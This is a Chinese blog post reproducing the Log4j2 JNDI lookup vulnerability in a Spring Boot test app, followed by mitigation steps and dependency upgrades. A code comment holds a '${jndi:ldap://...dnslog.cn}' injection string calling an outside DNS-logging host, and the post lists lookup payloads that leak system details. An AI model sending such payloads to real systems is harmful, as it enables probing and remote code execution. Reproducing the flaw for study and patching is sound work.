12-15 08:27 阅读 370

关注

SpringBoot复现log4j2漏洞

工程搭建及环境

pom.xml

<parent>
   <groupId>org.springframework.boot</groupId>
   <artifactId>spring-boot-starter-parent</artifactId>
   <version>2.6.1</version>
</parent>


<dependencies>
   <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
      <exclusions>
         <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
         </exclusion>
      </exclusions>

   </dependency>

   <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-log4j2</artifactId>
      <version>2.1.1.RELEASE</version>
   </dependency>
</dependencies>复制代码

java环境  jdk1.8

java version "11.0.13" 2021-10-19 LTS
Java(TM) SE Runtime Environment 18.9 (build 11.0.13+10-LTS-370)
Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.13+10-LTS-370, mixed mode)复制代码

web接口编写

@RestController
public class TestController {


    private static final Logger logger = LogManager.getLogger(TestController.class);


    /**
     * ${java:vm}   打印 ：Java HotSpot(TM) 64-Bit Server VM (build 25.162-b12, mixed mode)
     * <p>
     * <p>
     * http://www.dnslog.cn/
     * ${jndi:ldap://7yqrz4.dnslog.cn}
     *
     * @param str
     * @return
     */
    @PostMapping("/test")
    public String test(@RequestBody String str) {
        logger.info("str={}", str);
        return "return=" + str;
    }
}复制代码

测试漏洞

java:vm为什么会打印？debug进去看看，路径：org.apache.logging.log4j.core.lookup.JavaLookup#lookup

发现key有不少，挨个试下：

${java:vm}
Java HotSpot(TM) 64-Bit Server VM (build 25.162-b12, mixed mode)


${java:locale}
default locale: zh_CN, platform encoding: UTF-8

${java:hw}
processors: 4, architecture: x86_64-64


${java:os}
Mac OS X 10.14.6 unknown, architecture: x86_64-64

${java:version}
Java version 1.8.0_162

${java:runtime}
Java(TM) SE Runtime Environment (build 1.8.0_162-b12) from Oracle Corporation复制代码

DNSLog  www.dnslog.cn/

应对方案 ，受影响版本：Apache Log4j 2.x <= 2.14.1

1. jvm参数 -Dlog4j2.formatMsgNoLookups=true

2. 修改配置  log4j2.formatMsgNoLookups=True

3. 系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true

4. 升级>=2.16.0 mvnrepository.com/artifact/or…

5. 如果是依赖spring-boot-starter-log4j2

pom.xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-log4j2</artifactId>
    <version>2.1.1.RELEASE</version>

    <!--先排除-->
    <exclusions>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
        </exclusion>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
        </exclusion>
    </exclusions>
</dependency>

<!--再手动添加-->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.16.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.16.0</version>
</dependency>

作者：javanull
链接：https://juejin.cn/post/7041843601118068773